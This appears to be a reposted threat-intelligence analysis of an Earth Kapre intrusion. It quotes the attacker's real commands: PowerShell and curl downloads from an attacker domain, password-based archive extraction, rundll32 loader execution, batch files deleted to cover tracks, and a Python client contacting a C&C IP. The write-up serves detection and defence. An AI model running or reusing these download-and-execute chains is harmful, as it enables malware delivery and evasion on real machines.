After examining the events around the time the file was created, we discovered that the threat actor executed the following actions:
We observed that the initial command employs PowerShell to download a file (curl.tmp) from the URL http://preston[.]melaniebest[.]com/ms/curl.tmp and saves it as curl.exe in the C:WindowsSystem32 directory. For the benefit of this analysis, we will use this domain, but the same analysis should hold for the other domains in the previously mentioned list of URLs. Curl.exe is a command-line tool and library designed for efficient data transfer with URLs. While it is a legitimate tool, it can also be abused by threat actors for malicious purposes.
%COMSPEC% /Q /c echo powershell -c “iwr -Uri http://preston[.]melaniebest[.]com/ms/curl.tmp -OutFile C:WindowsSystem32curl.exe -UseBasicParsing” ^> 127.0.0.1C$dvPqyh 2^>^&1 > %TEMP%KzIMnc.bat & %COMSPEC% /Q /c %TEMP%KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%KzIMnc.bat
Next, 7za.tmp was downloaded and saved as 7za.exe in C:WindowsSystem32 directory. 7za.exe is a copy of 7-Zip, a popular open-source file compression and archiving utility.
C:Windowssystem32cmd.exe /Q /c echo curl -o C:WindowsSystem327za.exe http://preston[.]melaniebest[.]com/ms/7za.tmp ^> 127.0.0.1C$xWJhao 2^>^&1 > C:WindowsTEMPIAqJUm.bat & C:Windowssystem32cmd.exe /Q /c C:WindowsTEMPIAqJUm.bat & C:Windowssystem32cmd.exe /Q /c del C:WindowsTEMPIAqJUm.bat
The Earth Kapre loader was then downloaded using curl.exe from the same domain, http://preston[.]melaniebest[.]com/ms/ms.tmp, and was saved as ms.dll (though it should be noted that in some machines, the file name used was ps.dll) in the C:WindowsSystem32 directory. The threat actors used echo (as also seen in previous commands) and outputted it into a batch file, which is a commonly employed obfuscation technique. By echoing the command into a batch file, they could dynamically generate and execute commands, making it harder to analyze or detect malicious activities. The use of temporary batch files also allows for task automation and easier security monitoring evasion. We observed that the threat actors deleted the batch file afterward to cover their tracks.
C:Windowssystem32cmd.exe /Q /c echo curl -o C:WindowsSystem32ms.dll http://preston[.]melaniebest.com/ms/ms.tmp ^> 127.0.0.1C$tZpOKq 2^>^&1 > C:WindowsTEMPDFMPAa.bat & C:Windowssystem32cmd.exe /Q /c C:WindowsTEMPDFMPAa.bat & C:Windowssystem32cmd.exe /Q /c del C:WindowsTEMPDFMPAa.bat
Since ms.tmp is an archive, the threat actors would need to use the previously downloaded 7za.exe (7zip) to extract file contents via the password “123”.
C:Windowssystem32cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:WindowsTempms.tmp -o C:WindowsTemp ^> 127.0.0.1C$lgNMiK 2^>^&1 > C:WindowsTEMPBuWmUA.bat & C:Windowssystem32cmd.exe /Q /c C:WindowsTEMPBuWmUA.bat & C:Windowssystem32cmd.exe /Q /c del C:WindowsTEMPBuWmUA
Rundll32.exe was then used to execute ms.dll on the machine (in some machines, ps.dll was executed).
%COMSPEC% /Q /c echo rundll32.exe C:Windowssystem32ms.dll,ms ^> 127.0.0.1C$NoajCy 2^>^&1 > %TEMP%YdEcul.bat & %COMSPEC% /Q /c %TEMP%YdEcul.bat & %COMSPEC% /Q /c del %TEMP%YdEcul.bat
The Python script was crafted to establish outbound communication and execute remote commands using Server Message Block (SMB) via port 445. During the execution of the script named client.py, an external IP address, 198[.]252[.]101[.]86, is passed as a command-line argument, suggesting its potential role as a C&C server.
“C:Users<username>AppDataRoamingMUIServicepythonw.exe” C:Users<username>AppDataRoamingMUIServicerpvclient.py –server-ip 198[.]252[.]101[.]86 –server-port 41808
The presence of Impacket
Impacket is an open-source collection of Python classes for constructing and manipulating network protocols. Impacket activity was detected in the organization’s network, indicating its use of Windows network protocol interactions. The observed command lines align with Impacket’s smbexec script, enabling a semi-interactive shell via SMB. Threat actors are drawn to Impacket’s versatility and exploit its capabilities for unauthorized command execution, as highlighted in this blog entry.
Source: Original Post
“An interesting youtube video that may be related to the article above”